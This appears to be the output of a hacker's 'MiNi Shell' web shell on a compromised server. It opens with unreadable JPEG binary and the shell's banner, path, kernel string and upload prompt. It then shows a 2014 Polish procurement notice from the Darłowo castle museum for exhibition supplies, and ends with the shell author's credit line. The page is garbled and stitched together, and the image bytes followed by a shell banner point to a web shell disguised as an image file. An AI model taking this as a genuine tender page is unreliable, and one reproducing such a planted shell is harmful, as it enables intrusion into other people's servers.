JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140127/29756-N-2014.html

<p class="kh_header"><b>Darłowo: Realizacja dostaw i usług związanych z organizacją wystawy Dirlov - Rugenwalde - Darłowo. Miasto nad Bałtykiem</b><br>
<b>Numer ogłoszenia: 29756 - 2014; data zamieszczenia: 27.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Zamek Książąt Pomorskich , ul. Zamkowa 4, 76-150 Darłowo, woj. zachodniopomorskie, tel. 0-94 3142351, faks 0-94 3142351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> biuro@muzeumdarlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja dostaw i usług związanych z organizacją wystawy Dirlov - Rugenwalde - Darłowo. Miasto nad Bałtykiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie wszystkich niezbędnych prac dla stworzenia ekspozycji oraz zakup sprzętów ekspozycyjnych, dostaw, montaży - w zakresie i tematyce określonej w koncepcji i scenariuszu wystawy  obejmujące następujące zadania :


Zadanie nr II
1.  dostawa oraz montaż gablot w ilości 16 szt.
Zgodnie z załącznikiem Nr 10.

Zadanie nr III
1.  dostawa manekinów  16 szt.,
2.  dostawa strojów dla manekinów - 3 komplety strojów dostojników, 1 komplet ubioru króla Eryka, 5 kompletów ubiory mieszczan, 1 komplet ubiór woja pomorskiego, 1 komplet ubiór Wikinga, 1 komplet ubiór mnicha, 1 komplet ubiór rzemieślnika, 1 komplet ubiór osadnika,   1 komplet plażowy damski.
 Zgodnie z załącznikami Nr  11 i 12. 

Zadanie nr IV
1. dostawa replik naczyń drewnianych  - łyżek zdobionych10 szt., naczyń klepkowych z oplotem 2 szt., naczyń ośmiokątnych 3 szt., misek półkulistych 3 szt., talerzy owalnych 3 szt. , desek do chleba 3szt., rękojeści do noża krótkiego i długiego x 1 szt.,
2.  dostawa plakiety płaskorzeźby z ambony w kościele Mariackim w Darłowie.
Zgodnie z załącznikami Nr  13, 19.

Zadanie nr V
1. dostawa replik naczyń ceramicznych oraz ceramicznych plakiet Święców mis z Gdańska 2 szt., mis ze Starego Drawska 2 szt., miseczki kamionkowej z Kołobrzegu 5 szt., kubka kamionkowego 3 szt., dzbana małego 2 szt., dzbana dużego 2 szt., ceramicznych plakiet z herbami Święców 3 szt.,
2. dostawa replik noży z pocz.. XIV w.  - nóż długi, nóż krótki, nóż długi z rękojeścią x 1 szt.
Zgodnie z załącznikami  Nr 14 i 15.



Zadanie nr VI
1. dostawa stempla i prowadnicy do wybijania replik monet - szeląg Bogusława XIV 
x 1 szt. oraz krążków aluminiowych x 5000 szt.,
2. dostawa młotka do mennicy do wybijania monet z transportem.
Zgodnie z załącznikiem Nr 16 i 17.


Zadanie nr VIII
1. dostawa kosza plażowego z wikliny,
2. dostawa 2 koszy wiklinowych  - z transportem
Zgodnie z załącznikiem Nr  20 i 21.

Zadanie nr IX
1. dostawa telewizora z elementami do montażu, komputera z oprogramowaniem, rzutnika multimedialnego z elementami do montażu i  zapasową lampą oraz ekranu
 z elementami do montażu - zgodnie z podanymi parametrami.
Zgodnie z załącznikiem Nr 23.

Zadanie nr X
1. dostawa kiosku multimedialnego -infokiosku wewnętrznego z transportem - zgodnie z podanymi parametrami.
Zgodnie z załącznikiem Nr 24.

Zadanie nr XI
1. aranżacja ścian budynku w konstrukcji ryglowej do montażu wewnątrz sali wystawowej.
Zgodnie z załącznikiem  Nr 22.

Zadanie nr XII
1. dostawa materiałów graficznych do prezentacji na wystawie - wydruków na płótnie 45m2
      i materiale banerowym 60m2,
2. dostawa wydruku planu miasta na folii z laminatem podłogowym 2,25m2,
3. druk katalogu  -2000  szt.
4. druk banerów reklamowych 24m2,
5. druk zaproszeń na otwarcie wystawy - 300 szt.
6. druk ulotek -format A6 - 15000 szt., plakatów format A3 - 500 szt., A2 - 500 szt.
Zgodnie z załącznikiem Nr 25,26,29,31,32,33.

Zadanie nr XV
1. dostawa wykładziny z nadrukiem bruku szer.1,35 -1,40 m dł. 43 mb,
2. dostawa wykładziny uzupełniającej - czarna  szer. 1 m, długość -70 m,
3. dostawa wykładziny uzupełniającej  - czarna szer. 1 m, długość 120 m,
4. dostawa materiałów - styroduru na makietę bastionu 1m3.
Zgodnie z załącznikiem Nr 35, 36 i 34.
2. Przedmiot zamówienia obejmuje również uruchomienie systemów multimedialnych, wdrożeń oprogramowania systemów,  przeprowadzenie szkoleń pracowników Muzeum w zakresie obsługi zainstalowanych urządzeń, sprzętów i systemów.
3. Dostawa i montaż będą odbywały się sukcesywnie  zgodnie z ustaleniami, między Zamawiającym a Wykonawcą, po podpisaniu umowy. Wykonane systemy - multimedialny, wyposażenia wystawienniczego oraz oświetlenia będą zsynchronizowane tworząc funkcjonalną całość.
4. Zamawiający w ramach zadania wymaga dostawy oryginalnych, fabrycznie nowego, nieużywanego , nieuszkodzonego i oryginalnie zapakowanego wyposażenia spełniającego wszystkie wymogi odpowiednich norm europejskich i posiadającego oznaczenie CE.
5. Szczegółowe, minimalne wymagania funkcjonalno - techniczne poszczególnych elementów zamówienia oraz opisy, projekty niezbędne do wykonania zamówienia znajdują się   w załącznikach zgodnie z wykazem.
6. Wykonawca zobowiązany jest dostarczyć Zamawiającemu w dniu odbioru przedmiotu umowy, karty gwarancyjne, instrukcje obsługi, atesty, aprobaty techniczne wraz z dokumentacją powykonawczą w języku polskim.
7. Wykonawca na wykonany przedmiot zamówienia udzieli minimalnej 36 -miesięcznej gwarancji   na całość przedmiotu zamówienia, liczonej od daty podpisania końcowego protokołu zdawczo - odbiorczego. Wykonawca zobowiązuje się do zapewnienia pełnej funkcjonalności całości przedmiotu zamówienia poprzez bezpłatne usuwanie usterek w zakresie udzielonej przez siebie gwarancji.
8. Termin gwarancji ulega przedłużeniu w przypadku zgłoszenia reklamacji, o okres zaczynający się datą zgłoszenia jej na piśmie, a zakończy dniem odbioru przez Zamawiającego przedmiotu wolnego od wad i usterek.
9. Maksymalny termin realizacji usług serwisowych wynosi 24 godziny przez okres udzielonej gwarancji. Przez termin realizacji usług serwisowych Zamawiający rozumie czas, w jakim Wykonawca jest zobowiązany usunąć zgłoszone usterki lub dostarczyć urządzenia zamienne.
10. Wykonawca jest zobowiązany do świadczenia przeglądu gwarancyjnego minimum dwa razy w roku w okresie gwarancji  - w ramach zamówienia i w ramach wynagrodzenia ofertowego.
11. Wszystkie nazwy własne należy traktować jako te lub równoważne. Podane parametry techniczne urządzeń są parametrami minimalnymi. Dostarczone urządzenia nie mogą mieć parametrów gorszych niż opisane. Zamawiający dopuszcza możliwość przedstawienia w ofercie asortymentu  równoważnego, innego niż podany przez Zamawiającego pod warunkiem, iż oferowany asortyment będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych. Zgodnie z art. 34 ust. 5 ustawy Pzp na Wykonawcy leży obowiązek wykazania, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
12. Niniejsze zamówienie  dotyczy obiektu wpisanego do rejestru zabytków i podlega ochronie konserwatorskiej.
13. Realizacja przedmiotu zamówienia przebiegać będzie, na każdym etapie pod nadzorem merytorycznym osoby wyznaczonej przez Zamawiającego
14. Dostawa przedmiotu zamówienia na koszt i ryzyko Wykonawcy odbędzie się w terminie i godzinach wcześniej uzgodnionych z Zamawiającym.
15. Przed sporządzeniem oferty, Wykonawca winien zdobyć wszelkie informacje, które mogą mieć wpływ na przygotowanie oferty. Wszystkie elementy wchodzące w zakres zadania, które były do przewidzenia na etapie przygotowania oferty, a nie zostały zgłoszone Zamawiającemu nie będą wchodziły w zakres robót dodatkowych i będą musiały być wykonane na koszt Wykonawcy w ramach niniejszego zamówienia.
16. Wykonawca zobowiązuje się w ramach kwoty zadeklarowanej w ofercie do wykonania pełnego zakresu rzeczowego będącego przedmiotem  Umowy zgodnie z SIWZ, szczegółową wyceną ofertową, obowiązującymi normami i przepisami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.40.00-6, 45.31.00.00-3, 32.32.20.00-6, 30.20.00.00-1, 79.82.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zadanie nr II      -    650,00 zł
2. Zadanie nr III    -   1500,00 zł
3. Zadanie nr IV    -       50,00 zł
4. Zadanie nr V     -       50,00 zł
5. Zadanie nr VI   -      100,00 zł
6. Zadanie nr VIII -       50,00 zł
7. Zadanie nr IX    -     250,00 zł
8. Zadanie nr X      -    150,00 zł
9. Zadanie nr XI     -    800,00 zł
       10. Zadanie nr XII  -    400,00 zł
	11. Zadanie nr XV  -   500,00 zł
        
18.1. Wadium wnosi się przed upływem terminu składania ofert.
18.2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Przedsiębiorczości ( Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
18.3. Wadium należy wpłacić na rachunek  Zamawiającego.

76 8566 0003 0100 0390 2000 0132</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie
        uznany za spełniony, jeżeli Wykonawca oświadczy, że ww. warunek spełnia. 
        Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte 
        w  oświadczeniu o spełnieniu warunków  na zasadzie  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie
        uznany za spełniony, jeżeli Wykonawca oświadczy, że ww. warunek spełnia. 
        Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte 
        w  oświadczeniu o spełnieniu warunków  na zasadzie  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie
        uznany za spełniony, jeżeli Wykonawca oświadczy, że ww. warunek spełnia. 
        Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte 
        w  oświadczeniu o spełnieniu warunków  na zasadzie  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie
        uznany za spełniony, jeżeli Wykonawca oświadczy, że ww. warunek spełnia. 
        Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte 
        w  oświadczeniu o spełnieniu warunków  na zasadzie  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie
        uznany za spełniony, jeżeli Wykonawca oświadczy, że ww. warunek spełnia. 
        Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte 
        w  oświadczeniu o spełnieniu warunków  na zasadzie  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>41.1. W trakcie realizacji Umowy, postanowienia w niej zawarte mogą ulec zmianom i mogą dotyczyć:
1. Zmiany terminu realizacji przedmiotu Umowy w przypadku:
a. Wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
b. Wstrzymania przez Zamawiającego wykonania prac, które nie wynika z okoliczności leżących po stronie Wykonawcy,
c. Wystąpienie okoliczności, których strony Umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności,
2. W przypadku zmiany terminu realizacji przedmiotu Umowy wynikającego z okoliczności wymienionych w literach a-c, termin może ulec przedłużeniu nie dłużej jednak niż czas trwania tych okoliczności.
3. Zmiana wysokości ceny ryczałtowej brutto w przypadku zmiany stawki podatku VAT dla usług objętych przedmiotem zamówienia. W trakcie realizacji przedmiotu Umowy, strony dokonają odpowiedniej zmiany wynagrodzenia umownego, dotyczy to części wynagrodzenia za prace, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
4. Zmiana oznaczenia danych dotyczących Zamawiającego lub Wykonawcy.
5. W przypadku wystąpienia dodatkowych wytycznych wynikających ze zmiany przepisów obowiązujących przy współfinansowaniu Programu Operacyjnego  Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 - 2013.
26.2. Ww zmiany mogą być dokonane przed upływem terminu realizacji niniejszej Umowy, na pisemny wniosek złożony w terminie 7 dni od daty wystąpienia lub powzięcia wiadomości o zaistniałych okolicznościach. Wniosek winien zawierać szczegółowe uzasadnienie.
26.3. Zmiana postanowień Umowy wymaga zgody obu stron wyrażonej w formie pisemnej pod rygorem nieważności.

42. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumdarlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Zamek Książąt Pomorskich  ul. Zamkowa 4   76-150 Darłowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 12:00, miejsce: Muzeum Zamek Książąt Pomorskich ul. Zamkowa 4  76-150 Darłowo
Sekretariat Muzeum.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach Programu Operacyjnego pn. Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007 -2013, który współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rybackiego w ramach  Środka 4.1 Rozwój obszarów zależnych od rybactwa objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa, zawartą 
w Programie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com